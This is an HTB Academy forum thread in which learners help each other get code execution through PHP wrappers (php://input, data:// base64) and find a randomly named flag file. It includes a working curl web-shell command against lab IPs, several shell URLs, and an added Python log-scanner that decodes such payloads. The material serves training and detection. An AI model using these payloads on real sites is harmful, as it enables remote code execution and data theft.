Try to gain RCE using one of the PHP wrappers and read the flag at / (file inclusion, PHP wrappers)

I am learning the HTB Academy file inclusion topic, and while doing the PHP wrappers module I am able to get the web shell, but from the web shell I am not able to get the reverse shell or the flag.
Here the question is to find the flag at / with PHP wrappers. How should I know where the flag file is located?

I got the web shell and I am able to run id, ls and some other commands, but I cannot find the flag. How should I find where the flag is located? Does / mean the root directory or the home directory? I have been trying this for one week, and there are no hints for the question.


Hey, not sure if you got this already, but I would start by listing the root directory with something like ls /, or ls+/ in the URL-friendly form.
-onthesauce


I am also getting the same issue since the last 2 weeks: I got the web shell but I haven't got the reverse shell, and I need to find out the flag at /. What does this mean? Does it mean the root directory or the home directory?

There is the find command; when I try it: find /home -name flag.txt

The file is not located, and I am not able to find the flag.

Has anyone found this somewhere? Give me some hints.

First, we need to run the “pwd” command to check the current working directory; the output will be “/var/www/html”. After this we need to list all directories in the “/” folder; the command for this is “ls+/”. The output will have a text file “.txt”. We can use the cat command to see the flag inside the txt file.
command: “cat …/…/…/[name_of_text_file].txt”

NOTE: the name of the file which has the flag is not “flag”; it is some random characters.


curl -s -X POST --data '<?php system($_GET["cmd"]); ?>' "http://46.101.14.124:32568/index.php?language=php://input&cmd=cat+/37809e2f8952f06139011994726d9ef1.txt"
Try this command.


Thanks with this help I was able to complete the module.

But what I am wondering about is, where does the “+” come from when you are trying to pass the command for “ls /”? I realize the + is taking the place of the space in a multi-worded command… but why +? I literally do not know why I would use a + in this case. Some kind of encoding? But not URL, because a space translates to something like %20.


Also like this:
http://ip:port/shell.php?cmd=cat+/37809e2f8952f06139011994726d9ef1.txt


http://IP:port/index.php?language=./profile_images/shell.gif&cmd=cat%20/xxxxxxxxxxxxxxxxxxx.txt

Your hint about ls+/ was what I needed. The moment I ran ls+/ and saw the file in /, this exercise was done. Next is just cat+filename.txt.

What I think is: the URL is encoded in base64. When a URL is encoded in base64, any spaces in the URL are replaced with the + character.

I saw a discussion here: “Is a space possible in a base64 encoding?” on Stack Overflow.

Therefore, http://IP_address:port/index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=ls+/ would be decoded as http://94.237.62.195:57310/index.php?language=data://text/plain;base64,<?php system($_GET["cmd"]); ?>&cmd=ls%20/.

That is what I think is why + is used for ls+/ and cat+filename.txt in the command.

Is my understanding correct? Does anyone have any idea?
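An added example (Python, not from the thread or from HTB) on the + question: a small decoder that applies the same rules PHP uses to fill $_GET, where a bare + in the query string is the form-urlencoded spelling of a space and has nothing to do with base64, which is exactly why the + inside the base64 blob has to be sent as %2B. The same functions scan constructed access-log lines for a language= value that uses a PHP stream wrapper and recover the cmd and the data:// payload, which is what you would look for when reviewing server logs for this kind of file-inclusion abuse.

```python
import base64
import re
from urllib.parse import unquote_plus, urlsplit
# Constructed access-log lines (not from the thread). The data:// blob is the one
# quoted in the thread, percent-encoded the way a browser would send it.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?language=es.php HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=ls+/ HTTP/1.1" 200 1024
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "POST /index.php?language=php://input&cmd=id HTTP/1.1" 200 300
"""
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/')
WRAPPER_RE = re.compile(r"^(php|data|expect|phar|zip)://", re.IGNORECASE)

def decode_query(target):
    """Decode a query string the way PHP fills $_GET: %XX sequences are decoded
    and a bare '+' becomes a space (form-urlencoding, nothing to do with base64)."""
    params = {}
    for pair in urlsplit(target).query.split("&"):
        name, _, value = pair.partition("=")
        params.setdefault(unquote_plus(name), unquote_plus(value))
    return params

def decode_data_wrapper(value):
    """Plaintext carried by a data:...;base64,<blob> value, or None otherwise.
    Percent-decode first: '%2B' is the base64 '+', a bare '+' would be a space."""
    if not value.lower().startswith("data:") or ";base64," not in value:
        return None
    blob = value.split(";base64,", 1)[1]
    return base64.b64decode(blob, validate=True).decode("utf-8", "replace")

def find_wrapper_requests(log_text):
    """Report requests whose 'language' parameter is a PHP stream wrapper, with the
    decoded cmd and, for data://, the PHP code the include would have executed."""
    findings = []
    for line in log_text.splitlines():
        req = REQUEST_RE.search(line)
        if not req:
            continue
        params = decode_query(req.group("target"))
        lang = params.get("language", "")
        hit = WRAPPER_RE.match(lang)
        if hit:
            findings.append({"method": req.group("method"), "cmd": params.get("cmd"),
                             "wrapper": hit.group(1).lower(),
                             "payload": decode_data_wrapper(lang)})
    return findings

if __name__ == "__main__":
    print(find_wrapper_requests(SAMPLE_LOG))
```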

The random characters .txt you mentioned was really helpful, man. Thanks.